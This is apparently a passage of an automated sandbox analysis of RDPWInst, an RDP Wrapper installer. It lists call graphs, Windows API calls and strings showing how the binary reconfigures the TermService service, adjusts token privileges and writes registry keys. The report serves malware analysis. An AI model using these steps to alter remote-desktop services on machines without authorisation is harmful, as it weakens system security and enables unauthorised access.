40f93d 23416->23419 23430 4064f4 15 API calls 23416->23430 23418 40f9b2 23418->23333 23419->23418 23420 4064f4 15 API calls 23419->23420 23420->23419 23422 407322 23421->23422 23424 40734d 23422->23424 23431 4064f4 15 API calls 23422->23431 23425 407395 23424->23425 23426 4073a8 23424->23426 23427 406d2c 14 API calls 23425->23427 23432 406d1c 15 API calls 23426->23432 23429 4073a6 23427->23429 23429->23335 23430->23419 23431->23424 23432->23429 23434 406bf0 15 API calls 23433->23434 23435 414f4c 23434->23435 23446 414e7c 23435->23446 23437 414f66 23438 40f840 23437->23438 23439 406f48 15 API calls 23437->23439 23438->23347 23439->23438 23441 406c7c 23440->23441 23442 40fb68 CreateDirectoryW 23441->23442 23442->23360 23443->23346 23445->23350 23447 414e8e 23446->23447 23450 414ebd 23447->23450 23454 4064f4 15 API calls 23447->23454 23448 414ef0 23453 414f0b 23448->23453 23456 414728 15 API calls 23448->23456 23450->23448 23455 4064f4 15 API calls 23450->23455 23453->23437 23454->23450 23455->23448 23456->23453 23457->23368 23458->23377 23459->23372 23460->23382 23461->23394 23463 42fa06 23462->23463 23471 42fb48 FindResourceW 23463->23471 23465 42fa36 23465->23398 23483 42f548 23466->23483 23468 42f7ca 23487 42f798 69 API calls 23468->23487 23470 42f7e5 23470->23400 23472 42fb74 LoadResource 23471->23472 23473 42fb6d 23471->23473 23474 42fb87 23472->23474 23475 42fb8e SizeofResource LockResource 23472->23475 23481 42faa8 69 API calls 23473->23481 23482 42faa8 69 API calls 23474->23482 23478 42fbac 23475->23478 23478->23465 23479 42fb73 23479->23472 23480 42fb8d 23480->23475 23481->23479 23482->23480 23484 42f551 23483->23484 23488 42f58c 23484->23488 23486 42f56d 23486->23468 23487->23470 23489 42f5a7 23488->23489 23490 42f5d3 23489->23490 23491 42f64f 23489->23491 23513 40f650 23490->23513 23521 40f5f8 CreateFileW 23491->23521 23494 42f659 23512 42f64d 23494->23512 23522 40fa54 17 API calls 23494->23522 23496 42f5f0 23496->23512 23517 40fa54 17 API calls 23496->23517 23497 406bf0 15 API calls 23500 42f6bc 23497->23500 23498 42f674 GetLastError 23523 412bfc 15 API calls 23498->23523 23500->23486 23502 42f60f GetLastError 23518 412bfc 15 API calls 23502->23518 23503 42f68b 23524 413794 69 API calls 23503->23524 23506 42f626 23519 413794 69 API calls 23506->23519 23507 42f6ad 23525 405c30 14 API calls 23507->23525 23510 42f648 23520 405c30 14 API calls 23510->23520 23512->23497 23514 40f667 23513->23514 23515 40f68f 23513->23515 23516 40f689 CreateFileW 23514->23516 23515->23496 23516->23515 23517->23502 23518->23506 23519->23510 23521->23494 23522->23498 23523->23503 23524->23507 23527 406c44 14 API calls 23526->23527 23528 438a04 23527->23528 23529 43858c 15 API calls 23528->23529 23530 438a0c 23529->23530 23531 438a24 23530->23531 23552 4073dc 15 API calls 23530->23552 23533 438a35 23531->23533 23535 438a65 23531->23535 23534 438a51 RegOpenKeyExW 23533->23534 23538 438a60 23534->23538 23536 438a8b RegCreateKeyExW 23535->23536 23536->23538 23537 438ad3 23537->22661 23538->23537 23539 438ac6 23538->23539 23553 407184 15 API calls 23538->23553 23554 4388bc 17 API calls 23539->23554 23543 439392 23542->23543 23544 4393bd 23543->23544 23563 4064f4 15 API calls 23543->23563 23555 43987c 23544->23555 23547 4393e3 23547->22670 23548->22657 23549->22657 23550->22663 23552->23531 23554->23537 23556 439895 23555->23556 23557 4398a9 RegSetValueExW 23556->23557 23558 4398bc 23557->23558 23559 4398e4 23558->23559 23564 413794 69 API calls 23558->23564 23559->23547 23561 4398df 23565 405c30 14 API calls 23561->23565 23563->23544 23564->23561 23567 43ae3c 23566->23567 23568 407450 15 API calls 23567->23568 23569 43ae60 23568->23569 23570 407450 15 API calls 23569->23570 23571 43ae68 23570->23571 23572 407450 15 API calls 23571->23572 23573 43ae72 23572->23573 23574 404cdc 14 API calls 23573->23574 23575 43ae77 23574->23575 23576 4042f8 14 API calls 23575->23576 23577 43ae7c OpenSCManagerW 23576->23577 23578 43ae90 GetLastError 23577->23578 23579 43aeca 23577->23579 23580 407450 15 API calls 23578->23580 23582 43aed4 OpenServiceW 23579->23582 23581 43aeac 23580->23581 23585 407dec 14 API calls 23581->23585 23583 43af21 QueryServiceConfigW 23582->23583 23584 43aee1 CloseServiceHandle GetLastError 23582->23584 23588 43af33 23583->23588 23589 43af51 23583->23589 23586 407450 15 API calls 23584->23586 23587 43aeb1 23585->23587 23590 43af03 23586->23590 23592 407450 15 API calls 23587->23592 23593 407450 15 API calls 23588->23593 23591 4041b0 14 API calls 23589->23591 23594 407dec 14 API calls 23590->23594 23595 43af5b QueryServiceConfigW 23591->23595 23596 43aebb 23592->23596 23597 43af42 23593->23597 23598 43af08 23594->23598 23599 43af71 23595->23599 23600 43afbe 23595->23600 23601 404cdc 14 API calls 23596->23601 23602 404cdc 14 API calls 23597->23602 23605 407450 15 API calls 23598->23605 23627 4041cc 14 API calls 23599->23627 23628 4041cc 14 API calls 23600->23628 23607 43aec0 23601->23607 23603 43af47 23602->23603 23608 4042f8 14 API calls 23603->23608 23610 43af12 23605->23610 23612 4042f8 14 API calls 23607->23612 23613 43af1c 23608->23613 23609 43afd1 CloseServiceHandle CloseServiceHandle 23614 43aec5 23609->23614 23615 404cdc 14 API calls 23610->23615 23611 43af7b CloseServiceHandle CloseServiceHandle GetLastError 23616 407450 15 API calls 23611->23616 23612->23614 23613->23614 23614->22687 23617 43af17 23615->23617 23618 43afa3 23616->23618 23619 4042f8 14 API calls 23617->23619 23620 407dec 14 API calls 23618->23620 23619->23613 23621 43afa8 23620->23621 23622 407450 15 API calls 23621->23622 23623 43afb2 23622->23623 23624 404cdc 14 API calls 23623->23624 23625 43afb7 23624->23625 23626 4042f8 14 API calls 23625->23626 23626->23613 23627->23611 23628->23609 23629->22700 23631->22708 23633->22713 23635->22732 23636->22735 23637->22779 23638->22784 23639->22784 23640->22784 23642 439674 70 API calls 23641->23642 23643 4396c0 23642->23643 23643->22803 23663 4399a0 23644->23663 23646 439d58 23647 439d64 23646->23647 23648 439d5e RegCloseKey 23646->23648 23647->22808 23647->22851 23648->23647 23649->22791 23650->22791 23651->22796 23652->22813 23653->22833 23664 406c44 14 API calls 23663->23664 23665 4399c9 23664->23665 23666 43858c 15 API calls 23665->23666 23667 4399d1 23666->23667 23669 4399e9 23667->23669 23672 4073dc 15 API calls 23667->23672 23670 439a0a RegOpenKeyExW 23669->23670 23671 439a25 23670->23671 23671->23646 23672->23669 23674 43c32e 23673->23674 23690 4074fc 23674->23690 23676 43c35c 23677 43c378 CreateProcessW 23676->23677 23678 43c3b7 CloseHandle WaitForSingleObject CloseHandle 23677->23678 23679 43c384 GetLastError 23677->23679 23682 43c3b5 23678->23682 23680 407450 15 API calls 23679->23680 23681 43c39c 23680->23681 23683 407dec 14 API calls 23681->23683 23682->22936 23684 43c3a1 23683->23684 23685 407450 15 API calls 23684->23685 23686 43c3ab 23685->23686 23687 404cdc 14 API calls 23686->23687 23688 43c3b0 23687->23688 23689 4042f8 14 API calls 23688->23689 23689->23682 23691 4074a8 23690->23691 23692 4074f5 23691->23692 23693 4074bb 23691->23693 23698 4064ec 15 API calls 23691->23698 23692->23676 23693->23692 23695 407504 14 API calls 23693->23695 23696 4074cf 23695->23696 23696->23692 23699 4041cc 14 API calls 23696->23699 23698->23693 23699->23692 23700 42da28 23701 42da56 23700->23701 23702 408334 20 API calls 23701->23702 23703 42da89 23702->23703 23710 416308 23703->23710 23705 42daa3 23731 416e30 23705->23731 23708 42dacc 23709 402990 VirtualAlloc 23709->23708 23711 416332 23710->23711 23721 416352 23710->23721 23738 416ea0 InterlockedCompareExchange 23711->23738 23713 40789c 16 API calls 23715 4163fd 23713->23715 23714 416337 23716 416356 23714->23716 23717 41634d 23714->23717 23715->23705 23740 416270 InterlockedCompareExchange 23716->23740 23739 416ea0 InterlockedCompareExchange 23717->23739 23720 41635b 23722 416371 23720->23722 23723 41637a 23720->23723 23721->23713 23741 416270 InterlockedCompareExchange 23722->23741 23742 416edc 71 API calls 23723->23742 23726 41637f 23727 416395 23726->23727 23728 41639e 23726->23728 23743 416edc 71 API calls 23727->23743 23744 416dbc 71 API calls 23728->23744 23745 416b68 23731->23745 23733 416e5f 23734 406d2c 14 API calls 23733->23734 23735 416e74 23734->23735 23736 408340 16 API calls 23735->23736 23737 416e8f 23736->23737 23737->23709 23738->23714 23739->23721 23740->23720 23741->23721 23742->23726 23743->23721 23744->23721 23746 416b9a 23745->23746 23747 416b7f 23745->23747 23748 416bc2 23746->23748 23787 413794 69 API calls 23746->23787 23747->23746 23785 4136c4 69 API calls 23747->23785 23754 416bea 23748->23754 23789 413794 69 API calls 23748->23789 23751 416b95 23786 405c30 14 API calls 23751->23786 23752 416bbd 23788 405c30 14 API calls 23752->23788 23758 416c1b 23754->23758 23791 413794 69 API calls 23754->23791 23757 416be5 23790 405c30 14 API calls 23757->23790 23767 416a78 23758->23767 23762 416c16 23792 405c30 14 API calls 23762->23792 23765 408334 20 API calls 23766 416c42 23765->23766 23766->23733 23768 416aaa 23767->23768 23769 416a8f 23767->23769 23770 416ad2 23768->23770 23795 413794 69 API calls 23768->23795 23769->23768 23793 4136c4 69 API calls 23769->23793 23776 416afa 23770->23776 23797 413794 69 API calls 23770->23797 23773 416aa5 23794 405c30 14 API calls 23773->23794 23774 416acd 23796 405c30 14 API calls 23774->23796 23781 416b2b 23776->23781 23799 413794 69 API calls 23776->23799 23779 416af5 23798 405c30 14 API calls 23779->23798 23781->23765 23783 416b26 23800 405c30 14 API calls 23783->23800 23785->23751 23787->23752 23789->23757 23791->23762 23793->23773 23795->23774 23797->23779 23799->23783 23801 40472c 23802 404742 23801->23802 23803 404748 23802->23803 23804 4047a5 CreateFileW 23802->23804 23805 404857 GetStdHandle 23802->23805 23806 4047c3 23804->23806 23807 4048cb GetLastError 23804->23807 23805->23807 23810 404892 23805->23810 23809 4047d1 GetFileSize 23806->23809 23806->23810 23807->23803 23809->23807 23811 4047e5 SetFilePointer 23809->23811 23810->23803 23812 40489c GetFileType 23810->23812 23811->23807 23815 404801 ReadFile 23811->23815 23812->23803 23814 4048b7 CloseHandle 23812->23814 23814->23803 23815->23807 23816 404823 23815->23816 23816->23810 23817 404836 SetFilePointer 23816->23817 23817->23807 23818 40484b SetEndOfFile 23817->23818 23818->23807 23819 404855 23818->23819 23819->23810

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 637 43b7d4-43b7d7 638 43b7dc-43b7e1 637->638 638->638 639 43b7e3-43b7f4 638->639 640 43b7f8-43b80a OpenSCManagerW 639->640 641 43b848-43b8a9 call 408334 call 40816c call 404a04 call 40816c EnumServicesStatusExW 640->641 642 43b80c-43b843 GetLastError call 407450 call 407dec call 407450 call 404cdc call 4042f8 call 40632c 640->642 660 43b8af-43b8bc GetLastError 641->660 661 43b99e-43b9b5 CloseServiceHandle call 40816c 641->661 642->641 664 43b8fe-43b95a call 408334 call 40816c call 404a04 call 40816c EnumServicesStatusExW 660->664 665 43b8be-43b8f9 CloseServiceHandle call 407450 call 407dec call 407450 call 404cdc call 4042f8 call 40632c 660->665 671 43ba22-43ba26 661->671 672 43b9b7-43b9b8 661->672 664->661 714 43b95c-43b999 CloseServiceHandle GetLastError call 407450 call 407dec call 407450 call 404cdc call 4042f8 call 40632c 664->714 665->661 675 43ba4b-43ba52 671->675 676 43ba28-43ba46 call 407450 call 404cdc call 4042f8 call 40632c 671->676 677 43b9ba-43b9c5 672->677 682 43ba54-43ba58 675->682 683 43ba9f-43baf7 call 407450 call 407dec call 407450 call 404cdc call 4042f8 call 408334 call 40816c 675->683 676->675 677->671 681 43b9c7-43b9f6 call 406d9c call 40e50c * 2 call 4072a4 677->681 738 43b9f8-43ba1c call 406d9c 681->738 739 43ba1e-43ba20 681->739 690 43ba5a-43ba78 call 407450 call 404cdc call 4042f8 call 40632c 682->690 691 43ba7d-43ba91 call 43b1a8 call 43b58c 682->691 752 43bb80-43bb9b call 406bf0 call 40816c 683->752 753 43bafd-43bafe 683->753 690->691 717 43ba96-43ba9a 691->717 714->661 717->640 738->671 739->671 739->677 766 43bbe4-43bbeb 752->766 767 43bb9d-43bb9e 752->767 755 43bb00-43bb0a 753->755 755->752 758 43bb0c-43bb19 755->758 760 43bb1b-43bb37 call 406d9c call 4072a4 758->760 761 43bb7c-43bb7e 758->761 760->761 777 43bb39-43bb77 call 40816c call 408334 call 40816c call 406d9c 760->777 761->752 761->755 769 43bc13-43bc27 call 407450 call 404cdc call 4042f8 766->769 770 43bbed-43bc11 call 407450 * 2 call 404cdc call 4042f8 766->770 768 43bba0-43bba7 767->768 773 43bba9-43bbbc call 406bf0 768->773 774 43bbbe-43bbdb call 407184 768->774 794 43bc2c-43bc5c call 406be8 call 406be0 call 408340 769->794 770->794 785 43bbe0-43bbe2 773->785 774->785 777->761 785->766 785->768
                                                                                                                                                        APIs
                                                                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000005,00000000,0043BC5D,?,?,?,00447324,00000000,00000000,?,00443F06,00000000,00443FB2), ref: 0043B801
                                                                                                                                                        • GetLastError.KERNEL32(00000000,ServicesActive,00000005,00000000,00000000,00000000,00000030,00000003,?,00000000,?,?,?,00000000), ref: 0043B80C
                                                                                                                                                        • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,?,00000000,?,?,?,00000000), ref: 0043B8A2
                                                                                                                                                        • GetLastError.KERNEL32(00000000,00000000,00000030,00000003,?,00000000,00000000,?,?,00000000,00000000), ref: 0043B8AF
                                                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00000030,00000003,?,00000000,00000000,?,?,00000000,00000000), ref: 0043B8BF
                                                                                                                                                        • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0043B953
                                                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00000030,00000003,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0043B95D
                                                                                                                                                        • GetLastError.KERNEL32(00000000,00000000,00000000,00000030,00000003,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0043B962
                                                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00000030,00000003,?,00000000,?,?,?,00000000), ref: 0043B99F
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CloseErrorHandleLastService$EnumServicesStatus$ManagerOpen
                                                                                                                                                        • String ID: $sD$ServicesActive$TermService$[*] No shared services found.$[*] Shared services found: $[+] TermService found (pid $[-] EnumServicesStatusEx error (code $[-] Failed to set up TermService. Unknown error.$[-] OpenSCManager error (code $[-] TermService not found.
                                                                                                                                                        • API String ID: 2770857348-2470772499
                                                                                                                                                        • Opcode ID: bdcf77957b8ef17359aa2c2f35968ba8930b31ce6167e8ba152cfdf214f6386e
                                                                                                                                                        • Instruction ID: fb74497bf6b161f68451673f63bd6f491a4d1cb4b87c09a1aee9fb4a9c308b37
                                                                                                                                                        • Opcode Fuzzy Hash: bdcf77957b8ef17359aa2c2f35968ba8930b31ce6167e8ba152cfdf214f6386e
                                                                                                                                                        • Instruction Fuzzy Hash: A1C15074A041049BD710FBB9DD42B5E76A5EB89308F11507FF640BB292CB3CAD058BAE

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        APIs
                                                                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001,00000000,0043B319,?,?,-00000001,00000000,?,?,0043BA8C,00000000,00000000,00000000,00000030), ref: 0043B1FE
                                                                                                                                                        • GetLastError.KERNEL32(00000000,ServicesActive,00000001,00000000,0043B319,?,?,-00000001,00000000,?,?,0043BA8C,00000000,00000000,00000000,00000030), ref: 0043B209
                                                                                                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000002,00000000,ServicesActive,00000001,00000000,0043B319,?,?,-00000001,00000000,?,?,0043BA8C,00000000), ref: 0043B24F
                                                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00000002,00000000,ServicesActive,00000001,00000000,0043B319,?,?,-00000001,00000000,?,?,0043BA8C), ref: 0043B25B
                                                                                                                                                        • GetLastError.KERNEL32(00000000,00000000,00000000,00000002,00000000,ServicesActive,00000001,00000000,0043B319,?,?,-00000001,00000000,?,?,0043BA8C), ref: 0043B260
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorLastOpenService$CloseHandleManager
                                                                                                                                                        • String ID: $sD$...$ServicesActive$[*] Configuring $[-] ChangeServiceConfig error (code $[-] OpenSCManager error (code $[-] OpenService error (code
                                                                                                                                                        • API String ID: 48634454-398082305
                                                                                                                                                        • Opcode ID: 3b1e76f9c62e1046217b3bbe464b976e02e2f47daf27cfab7c11257a6428595c
                                                                                                                                                        • Instruction ID: ec3001641675e227f0f71ffcc16d431bf32a474d6a16b1f18b89db5f0a2815a5
                                                                                                                                                        • Opcode Fuzzy Hash: 3b1e76f9c62e1046217b3bbe464b976e02e2f47daf27cfab7c11257a6428595c
                                                                                                                                                        • Instruction Fuzzy Hash: 32318DA4708210AAE611B7B68D43B2F6598DF8D308F12917BB614A6693CB3C9D0195BF

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        APIs
                                                                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001,00000000,0043B6CE,?,00000000), ref: 0043B5EA
                                                                                                                                                        • GetLastError.KERNEL32(?,00000000,ServicesActive,00000001,00000000,0043B6CE,?,00000000), ref: 0043B5F9
                                                                                                                                                          • Part of subcall function 0043B48C: CloseServiceHandle.ADVAPI32(00000000,00000000,0043B52C,?,00000000,?,?,0043B6A3,?,00000000,00000000,?,00000000,00000000,00000010,00000000), ref: 0043B4BC
                                                                                                                                                          • Part of subcall function 0043B48C: CloseServiceHandle.ADVAPI32(00000000,00000000,0043B52C,?,00000000,?,?,0043B6A3,?,00000000,00000000,?,00000000,00000000,00000010,00000000), ref: 0043B4D1
                                                                                                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000010,00000000,ServicesActive,00000001,00000000,0043B6CE,?,00000000), ref: 0043B61F
                                                                                                                                                        • GetLastError.KERNEL32(?,00000000,00000000,00000010,00000000,ServicesActive,00000001,00000000,0043B6CE,?,00000000), ref: 0043B62E
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Service$CloseErrorHandleLastOpen$Manager
                                                                                                                                                        • String ID: $sD$...$OpenSCManager$OpenService$ServicesActive$StartService$[*] Starting
                                                                                                                                                        • API String ID: 2257214823-3855835416
                                                                                                                                                        • Opcode ID: 55f0df0e7310880f6e7cb70b762c89182bbbe75636a3247ae01688996091d268
                                                                                                                                                        • Instruction ID: 0e693e6e1cec2ac2fe46a8ff9d209bc722a6061919d6bcedfcc5fc96e321ed9b
                                                                                                                                                        • Opcode Fuzzy Hash: 55f0df0e7310880f6e7cb70b762c89182bbbe75636a3247ae01688996091d268
                                                                                                                                                        • Instruction Fuzzy Hash: 6C313471A04208AEDB10FBB68842B5F77E8DB4C715F60947BF614E7283DB7C9940869E

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        APIs
                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000028,?,00000000,0043C09E,?,?,00447324), ref: 0043BF3D
                                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000,00000028,?,00000000,0043C09E,?,?,00447324), ref: 0043BF43
                                                                                                                                                        • GetLastError.KERNEL32(00000000,00000028,?,00000000,0043C09E,?,?,00447324), ref: 0043BF4C
                                                                                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,?), ref: 0043BFA6
                                                                                                                                                        • GetLastError.KERNEL32(00000000,00000028,?,00000000,0043C09E,?,?,00447324), ref: 0043BFAF
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorLastProcess$CurrentLookupOpenPrivilegeTokenValue
                                                                                                                                                        • String ID: $sD$[-] AdjustTokenPrivileges error (code $[-] LookupPrivilegeValue error (code $[-] OpenProcessToken error (code
                                                                                                                                                        • API String ID: 1401577899-1200187420
                                                                                                                                                        • Opcode ID: 4f72a90d0289c3e65b588dbff969bb89f75e63602ae5a34113a3e67517c1ed7a
                                                                                                                                                        • Instruction ID: 40249df541e28cb1c3cbeffac081f98f3db748ff3bf72c69c2aa91bf02ef4f1c
                                                                                                                                                        • Opcode Fuzzy Hash: 4f72a90d0289c3e65b588dbff969bb89f75e63602ae5a34113a3e67517c1ed7a
                                                                                                                                                        • Instruction Fuzzy Hash: E5412475E00218AFDB04EBE5DD81A9EB7B8EF49704F11407BF500F2291DA789D059B6A
                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000002,?,?,0044BFA8,00447324,0043DEB8,00000000,0043E150,?,?,00447324), ref: 0043DC7A
                                                                                                                                                        • FindResourceW.KERNEL32(00000000,00000001,00000010,00000000,00000000,00000002,?,?,0044BFA8,00447324,0043DEB8,00000000,0043E150,?,?,00447324), ref: 0043DC8A
                                                                                                                                                        • LoadResource.KERNEL32(00000000,00000000,00000000,00000001,00000010,00000000,00000000,00000002,?,?,0044BFA8,00447324,0043DEB8,00000000,0043E150), ref: 0043DC97
                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000010,00000000,00000000,00000002,?,?,0044BFA8,00447324,0043DEB8,00000000,0043E150), ref: 0043DCF5
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: LibraryLoadResource$FindFree
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3272429154-0
                                                                                                                                                        • Opcode ID: 15bd354d354d96cc7854a01dd3595191e335ff94095102c971dcd749e24b3d64
                                                                                                                                                        • Instruction ID: b141022db8bc2a2b6abfb651a233e3798db1869765cd13709d0418182ea328c4
                                                                                                                                                        • Opcode Fuzzy Hash: 15bd354d354d96cc7854a01dd3595191e335ff94095102c971dcd749e24b3d64
                                                                                                                                                        • Instruction Fuzzy Hash: 9411E3273067445AC721DA268A81EDF3B169FC1340F09C1A6F9009F396E679C901C39A
                                                                                                                                                        APIs
                                                                                                                                                        • GetUserDefaultUILanguage.KERNEL32(00000003,?,?,00000000,?,00409584,?,?,?,00000000,00000105,00000000,004095BB,?,00437408), ref: 004093DC
                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,00000003,?,?,00000000,?,00409584,?,?,?,00000000,00000105,00000000,004095BB,?,00437408), ref: 004093E5
                                                                                                                                                          • Part of subcall function 004092D8: FindFirstFileW.KERNEL32(?,?,00000000), ref: 004092F2
                                                                                                                                                          • Part of subcall function 004092D8: FindClose.KERNEL32(00000000,?,?,00000000), ref: 00409302
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
